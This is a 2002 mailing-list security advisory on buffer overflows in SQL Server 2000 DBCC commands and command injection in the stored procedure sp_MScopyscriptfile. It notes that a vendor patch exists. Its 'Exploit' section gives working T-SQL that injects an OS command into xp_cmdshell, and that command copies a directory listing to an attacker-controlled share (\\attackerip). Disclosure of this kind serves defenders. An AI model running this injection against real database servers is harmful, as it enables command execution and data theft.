SQL Server 2000 Buffer Overflows and SQL Inyection vulnerabilities
From: c c (cesarc56@UOL.COM.AR)Date: 07/25/02
- Previous message: http-equiv@excite.com: "UPDATE: Re: REFRESH: EUDORA MAIL 5.1.1"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 25 Jul 2002 17:50:00 -0300 From: c c <cesarc56@UOL.COM.AR> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Security Advisory
Name: SQL Server 2000 Buffer Overflows and SQL
Inyection vulnerabilities.
System Affected : Sql Server 2000 all Service Packs.
Severity : High.
Author: Cesar Cerrudo.
Date: 07/25/2002
Advisory Number: CC070205
Overview:
Database Consistency Checkers (DBCCs) are command
console utilities that allow maintenance and other
operations to be performed on a SQL Server, some of the
DBCC functions are vulnerable to buffer overflows. The
explotation of these vulnerabilities could enable an
attacker to run code in the context of the SQL Server
service.
Some stored procedures used in database replication are
vulnerable to SQL injection. The explotation of these
vulnerabilities could enable an attacker to run OS
commands with xp_cmdshell in the context of the SQL
Server Agent Proxy account.
Details:
The following DBCC funcions contain unchecked buffers:
DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
DBCC INDEXFRAG ('','XXX...') (b)
DBCC UPDATEUSAGE ('','XXX...') (c)
DBCC CHECKCONSTRAINTS ('XXX...') (c)
DBCC SHOWCONTIG ('XXX...') (d)
DBCC CLEANTABLE ('','XXX...') (d)
(a) Only members of sysadmin fixed server role can run
this command.
(b) Only members of sysadmin fixed server role,
db_owner or db_ddladmin fixed database role can run
this command.
(c) Only members of sysadmin fixed server role or
db_owner fixed database role can run this command.
(d) All users can run this command.
The buffer overflow in DBCC ADDEXTENDEDPROC affects SQL
Server 7.0 too.
Sp_MScopyscriptfile stored procedure is one of several
stored procedures (not mentioned here for time reasons)
vulnerables to SQL Inyection. Sp_MScopyscriptfile
create a directory in the SQL Server replication
directory and then copy a script file into it. It has
one input parameter @scriptfile that is the name of the
script file to be copied. In that parameter OS commands
can be inyected and then executed by xp_cmdshell.
---Code snip of sp_MScopyscriptfile stored procedure
where the inyection ocurrs---
select @cmd = N'copy "' + @scriptfile + N'" "' +
@directory + N'"'
exec @retcode = master..xp_cmdshell @cmd, NO_OUTPUT
----End code snip-----
SQL Server Agent Proxy account must be enabled to
succesfull exploit these SQL Inyection vulnerabilities
and is not enabled by default.
Exploit :
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ > "\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''
More Details:
http://www.appsecinc.com/resources/alerts/mssql/02-
0011.html
Vendor Status :
Microsoft was contacted, we work together and Microsoft
release a fix.
Patch Available :
http://www.microsoft.com/technet/security/bulletin/MS02-
038.asp
Thanks!:
Special thanks to Aaron Newman (Application Security,
Inc.) for his
collaboration in testing.
_________________________________________________________________
UOLMAIL - Todo Argentino tiene derecho a lo mejor de Internet.
http://www.uolmail.com.ar
- Previous message: http-equiv@excite.com: "UPDATE: Re: REFRESH: EUDORA MAIL 5.1.1"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
